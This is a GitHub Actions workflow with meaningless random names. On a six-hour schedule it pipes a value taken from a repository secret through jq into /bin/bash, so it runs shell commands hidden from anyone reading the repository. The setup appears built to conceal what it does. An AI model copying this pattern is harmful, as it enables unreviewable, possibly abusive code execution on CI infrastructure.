name: fengjiwai4433
on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengjiwai4433
        env:
          oxrc89: ${{ secrets.oxrc89 }}
        run: |
          echo $oxrc89 | jq -r .ukwhe94466 | /bin/bash
          echo $mmy46 | jq -r .okn2427 | /bin/bash
          echo $kx58 | jq -r .qxjrw0 | /bin/bash
          echo $txick82 | jq -r .p234 | /bin/bash

